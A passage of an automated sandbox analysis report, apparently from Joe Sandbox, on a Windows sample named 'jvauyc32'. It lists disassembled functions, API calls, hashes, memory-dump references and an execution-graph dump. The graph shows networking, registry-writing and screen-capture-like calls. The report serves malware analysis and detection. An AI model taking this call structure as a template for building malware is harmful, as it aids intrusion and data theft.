                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3630a4357397e900909c082e122381b7b67141189cd201311aa313e504ddd299
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FF0A423A502146BDB2873786C47FEF179C4BC27A0F20442EF50DEB192ED95D9458174
                                                                                                                                                                                                                                                                                            Function 009714FC Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 266 9714fc-971512 call 9714ba 269 971514-971538 266->269 270 97157a-97157c 266->270 271 97153d-97154f call 971ed5 269->271 274 971551-97155a 271->274 275 97155e-97156d 271->275 276 97155c 274->276 277 97153a 274->277 278 971573-971576 LoadLibraryA 275->278 279 97156f-971571 275->279 276->279 277->271 280 971578-971579 278->280 279->280 280->270
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00000000,00000000,00000000), ref: 00971576
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6e72f38f99c838cfc4fb8e9bffb4a9b87a33a1d28f34a7395b2a87c3341a6d0b
                                                                                                                                                                                                                                                                                            • Instruction ID: 8a5f206ec5ca9e960bade145df4504b5e5da93285e79d6ff9b73865733687b44
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e72f38f99c838cfc4fb8e9bffb4a9b87a33a1d28f34a7395b2a87c3341a6d0b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE115E36A00504EFCB24EF9CC891AADB7F6FFC8715B258559E84A93711DB30ED119B50
                                                                                                                                                                                                                                                                                            Function 009760EC Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 281 9760ec-976110 call 97157d RegSetValueExW
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,00976086,?,00976086,00000000,?,?,00000000), ref: 0097610D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6f6473560ad2c1c083fec917bef3436dd30e58b00a3ac352e10f65526addaaf8
                                                                                                                                                                                                                                                                                            • Instruction ID: f9b181613b1882aa35d0eba3b340064eadb73bead10431778b69b6821c8e581c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f6473560ad2c1c083fec917bef3436dd30e58b00a3ac352e10f65526addaaf8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AD0C9321842097FEF155ED4ED03F993B16EB84760F108005FB28180E19AB3A9609A55
                                                                                                                                                                                                                                                                                            Function 00975353 Relevance: 1.3, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,0000005B,00003000,00000004,00000000,?,00971E7D,?,02020202,?,00971DA8,70677177), ref: 00975372
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c716634607aa5d6ebeb11f76fb8d518c1ba7ef5770581fb8aa11edb8290a5087
                                                                                                                                                                                                                                                                                            • Instruction ID: d02e91cd3ef1c7ac23c798c77114800c582c1ebc3768aa387a32f7e507253e05
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c716634607aa5d6ebeb11f76fb8d518c1ba7ef5770581fb8aa11edb8290a5087
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3E0C2273447047BE65962899C03F6B3A5ECBC1BA0F104028F31C891C1EDD3EA4082B6
                                                                                                                                                                                                                                                                                            Function 0097538C Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00971DBA,00000000), ref: 009753AD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 63aca5e69f362a2f66964f99f5798b692e83d8749495556c3b5e2a127cb4424e
                                                                                                                                                                                                                                                                                            • Instruction ID: 444f0f5fce74d387a73fcae90888a345a17e040a743ef049e7cd764f9d4b6c8e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63aca5e69f362a2f66964f99f5798b692e83d8749495556c3b5e2a127cb4424e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DC01232144708BEF7142994DC0BF5436589780750F60C016B70C2C4F19DE269D08984
                                                                                                                                                                                                                                                                                            Function 00975307 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3ba3e3d50fd1033ab19ddf5a9e4d35dd46908737180192106eb6e237664af37a
                                                                                                                                                                                                                                                                                            • Instruction ID: 6573b0fcc1c3b71fa5f7dc7688b9bc8f80f0c3577b947c90651af02df60717ff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ba3e3d50fd1033ab19ddf5a9e4d35dd46908737180192106eb6e237664af37a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66C04C322D93087FF91966D5AC03F593A498B81F64F604005F71C1C4D298D36690459A
                                                                                                                                                                                                                                                                                            Function 00972371 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00975868,?,00975868,000000FF), ref: 00972385
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 963638d8fe267b8f1dfdafc6b40a87051c94e5109645c09a02a2759dc80fe65e
                                                                                                                                                                                                                                                                                            • Instruction ID: 46cf593364ad2b16e30b9f8ad805f18a663ccd0417a83d42729f09b6073ea0a0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 963638d8fe267b8f1dfdafc6b40a87051c94e5109645c09a02a2759dc80fe65e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFB0923264C20C3FEA1826D5EC0BE583B49CBC0760F604016FA1D480A2ADE3AA9054D5

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:18.8%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                            Signature Coverage:3.7%
                                                                                                                                                                                                                                                                                            Total number of Nodes:1706
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                                            execution_graph 5700 406e43 5701 406efb LoadLibraryW 5700->5701 5703 406e53 5701->5703 5702 406ea7 ExitThread 5703->5702 5704 404c49 2 API calls 5703->5704 5706 406e73 5704->5706 5705 406e9e 5705->5702 5706->5705 5708 409ba4 GetModuleHandleW 5706->5708 5709 409bc2 GetProcAddress 5708->5709 5738 409bf5 5708->5738 5710 409bd9 5709->5710 5709->5738 5711 404c49 2 API calls 5710->5711 5712 409be4 5711->5712 5740 408812 5712->5740 5714 409bf0 5715 4063b6 2 API calls 5714->5715 5714->5738 5716 409c10 5715->5716 5717 40887b 8 API calls 5716->5717 5716->5738 5718 409c3f 5717->5718 5719 404c49 2 API calls 5718->5719 5718->5738 5720 409c64 5719->5720 5721 4079b2 8 API calls 5720->5721 5722 409c6e 5721->5722 5723 404c49 2 API calls 5722->5723 5724 409c75 5723->5724 5725 407d09 25 API calls 5724->5725 5726 409c7f 5725->5726 5727 404c49 2 API calls 5726->5727 5728 409c91 5727->5728 5729 40632b 2 API calls 5728->5729 5728->5738 5730 409ccc 5729->5730 5731 404c49 2 API calls 5730->5731 5730->5738 5732 409cea 5731->5732 5733 404c49 2 API calls 5732->5733 5732->5738 5734 409d0f 5733->5734 5735 409d32 5734->5735 5736 409d43 5734->5736 5737 407388 12 API calls 5735->5737 5739 403ad5 24 API calls 5736->5739 5737->5738 5738->5705 5739->5738 5741 406efb LoadLibraryW 5740->5741 5742 40882e 5741->5742 5743 406efb LoadLibraryW 5742->5743 5746 408875 5742->5746 5744 408854 5743->5744 5745 401050 2 API calls 5744->5745 5745->5746 5746->5714 6312 4090c3 6313 404c49 2 API calls 6312->6313 6314 4090d4 6313->6314 6315 402e20 7 API calls 6314->6315 6316 4090f7 6315->6316 6320 409128 6316->6320 6324 409018 9 API calls 6316->6324 6318 409139 _endthreadex 6319 40910b 6319->6320 6321 408b72 43 API calls 6319->6321 6320->6318 6322 409118 6321->6322 6323 406efb LoadLibraryW 6322->6323 6323->6320 6327 408f76 GetModuleHandleW GetProcAddress 6324->6327 6328 408fb1 GetModuleHandleW GetProcAddress 6327->6328 6329 408fad DeleteObject GdiplusShutdown 6327->6329 6328->6329 6330 408fc3 6328->6330 6329->6319 6332 408eda GdipGetImageEncodersSize 6330->6332 6333 408f01 6332->6333 6340 408efc 6332->6340 6334 404c49 2 API calls 6333->6334 6335 408f0a 6334->6335 6336 408f11 GdipGetImageEncoders 6335->6336 6335->6340 6337 408f26 6336->6337 6338 408f4a free 6336->6338 6337->6338 6339 408f29 wcscmp 6337->6339 6338->6340 6339->6337 6339->6340 6340->6329 6142 404104 6143 404b40 VirtualAlloc 6142->6143 6144 40411d 6143->6144 6145 404c49 2 API calls 6144->6145 6158 40412c 6145->6158 6146 4010ce 2 API calls 6146->6158 6147 406efb LoadLibraryW 6147->6158 6148 404511 6149 404520 _endthreadex 6148->6149 6152 403dd9 LoadLibraryW 6152->6158 6153 403f00 socket VirtualAlloc LoadLibraryW 6153->6158 6154 4040aa LoadLibraryW 6154->6158 6155 403d14 LoadLibraryW 6155->6158 6156 403d51 WSAGetLastError LoadLibraryW 6156->6158 6158->6146 6158->6147 6158->6148 6158->6152 6158->6153 6158->6154 6158->6155 6158->6156 6160 403ce0 6158->6160 6163 403e47 6158->6163 6168 403e1f 6158->6168 6171 4040c0 6158->6171 6161 406efb LoadLibraryW 6160->6161 6162 403cf8 6161->6162 6162->6158 6164 403e52 6163->6164 6165 403e57 6164->6165 6177 403d51 6164->6177 6165->6158 6169 403d51 2 API calls 6168->6169 6170 403e43 6169->6170 6170->6158 6175 4040ca 6171->6175 6172 404101 6172->6158 6174 403d51 2 API calls 6174->6175 6175->6172 6175->6174 6182 403f4e 6175->6182 6199 403dd9 6175->6199 6180 403d5c 6177->6180 6178 403da6 6178->6158 6179 406efb LoadLibraryW 6179->6180 6180->6178 6180->6179 6181 403d7d WSAGetLastError 6180->6181 6181->6178 6181->6180 6183 403f64 6182->6183 6185 404002 6182->6185 6184 406efb LoadLibraryW 6183->6184 6186 403f83 6184->6186 6187 406efb LoadLibraryW 6185->6187 6197 403fad 6185->6197 6189 403fb2 6186->6189 6190 403f9e 6186->6190 6188 404031 6187->6188 6193 406efb LoadLibraryW 6188->6193 6188->6197 6192 406efb LoadLibraryW 6189->6192 6204 403db1 6190->6204 6194 403fce 6192->6194 6195 40405f 6193->6195 6196 403db1 2 API calls 6194->6196 6194->6197 6195->6197 6198 403d51 2 API calls 6195->6198 6196->6197 6197->6175 6198->6197 6200 403de0 6199->6200 6201 403de4 6199->6201 6200->6175 6202 406efb LoadLibraryW 6201->6202 6203 403df5 6202->6203 6203->6175 6205 403d51 2 API calls 6204->6205 6206 403dd5 6205->6206 6206->6197 6341 4022c6 _exit 6342 4047c6 6343 404c49 2 API calls 6342->6343 6344 4047dd 6343->6344 6345 404c49 2 API calls 6344->6345 6346 4047fb 6345->6346 6347 404961 6346->6347 6348 404814 memset 6346->6348 6349 4084ee 2 API calls 6347->6349 6350 4089a3 3 API calls 6348->6350 6353 40495f 6349->6353 6351 40483b 6350->6351 6371 40469b 6351->6371 6358 40497d _endthreadex 6353->6358 6354 40484f 6355 404860 memset 6354->6355 6356 40490b 6354->6356 6357 406efb LoadLibraryW 6355->6357 6356->6347 6359 40491b 6356->6359 6365 40488d 6357->6365 6360 404c49 2 API calls 6359->6360 6361 404925 wsprintfW 6360->6361 6362 408d7e 43 API calls 6361->6362 6363 40494d 6362->6363 6366 408649 43 API calls 6363->6366 6364 406efb LoadLibraryW 6364->6365 6365->6356 6365->6364 6367 404903 6365->6367 6369 4048aa wcsstr 6365->6369 6366->6353 6368 401038 2 API calls 6367->6368 6368->6356 6369->6365 6370 4048c4 wsprintfW 6369->6370 6370->6365 6372 4046a7 6371->6372 6373 4046ab 6372->6373 6374 4046af wcstok 6372->6374 6373->6354 6375 4046e3 6374->6375 6376 4046cc 6374->6376 6375->6354 6377 4046d0 wcstok 6376->6377 6377->6375 6377->6377 6842 405a86 FreeLibrary 6846 403b87 GetPEB 5747 409e4e 5748 404c49 2 API calls 5747->5748 5749 409e5f 5748->5749 5750 409e6c atoi 5749->5750 5751 409e86 5750->5751 5754 409ea2 5751->5754 5757 409dae 5751->5757 5768 408649 5754->5768 5755 409eb0 5756 409eb7 _endthreadex 5755->5756 5758 404c49 2 API calls 5757->5758 5759 409dc1 5758->5759 5760 409ddb 5759->5760 5761 404c49 2 API calls 5759->5761 5777 4089a3 5760->5777 5761->5759 5763 409de7 5789 40816f 5763->5789 5765 409dfc 5767 409e1e 5765->5767 5799 408b72 5765->5799 5767->5754 5857 404b6f 5768->5857 5771 406efb LoadLibraryW 5772 408667 5771->5772 5773 404c49 2 API calls 5772->5773 5775 408675 5773->5775 5774 4086a3 5774->5755 5775->5774 5776 408d7e 43 API calls 5775->5776 5776->5774 5778 4089b1 5777->5778 5779 404c49 2 API calls 5778->5779 5788 4089b5 5778->5788 5780 4089d4 5779->5780 5781 404c49 2 API calls 5780->5781 5784 4089e5 5781->5784 5782 408a39 5783 406efb LoadLibraryW 5782->5783 5785 408a49 5783->5785 5784->5782 5786 408a0c sscanf 5784->5786 5787 406efb LoadLibraryW 5785->5787 5786->5782 5786->5784 5787->5788 5788->5763 5790 408185 5789->5790 5791 404c49 2 API calls 5790->5791 5792 4081a4 5791->5792 5793 406efb LoadLibraryW 5792->5793 5795 4081b7 5793->5795 5794 406efb LoadLibraryW 5794->5795 5795->5794 5796 40823a 5795->5796 5797 4081f9 lstrcpyW 5795->5797 5796->5765 5830 408041 5797->5830 5800 4064d0 3 API calls 5799->5800 5801 408b99 5800->5801 5802 40887b 8 API calls 5801->5802 5803 408bb2 5802->5803 5804 406efb LoadLibraryW 5803->5804 5820 408d29 5803->5820 5805 408bde 5804->5805 5806 406efb LoadLibraryW 5805->5806 5805->5820 5807 408c07 5806->5807 5848 40542f 5807->5848 5810 406efb LoadLibraryW 5811 408c25 5810->5811 5812 404c49 2 API calls 5811->5812 5813 408c37 sprintf 5812->5813 5814 408c58 5813->5814 5815 404c49 2 API calls 5814->5815 5816 408c66 5815->5816 5817 408c72 wsprintfA 5816->5817 5816->5820 5818 408c90 5817->5818 5819 408c94 Sleep 5817->5819 5818->5819 5821 408c9b 5818->5821 5819->5821 5820->5765 5821->5820 5822 404c49 2 API calls 5821->5822 5823 408cd8 5822->5823 5823->5820 5824 408cdf sprintf 5823->5824 5825 408d10 5824->5825 5826 408d24 5825->5826 5827 408d2b 5825->5827 5829 407388 12 API calls 5826->5829 5828 403ad5 24 API calls 5827->5828 5828->5820 5829->5820 5846 402b53 5830->5846 5833 406efb LoadLibraryW 5843 408078 5833->5843 5834 408164 5834->5795 5835 4080a4 _wcsicmp 5836 4080bc _wcsicmp 5835->5836 5835->5843 5838 4080d4 lstrcatW 5836->5838 5836->5843 5837 406efb LoadLibraryW 5837->5843 5839 408108 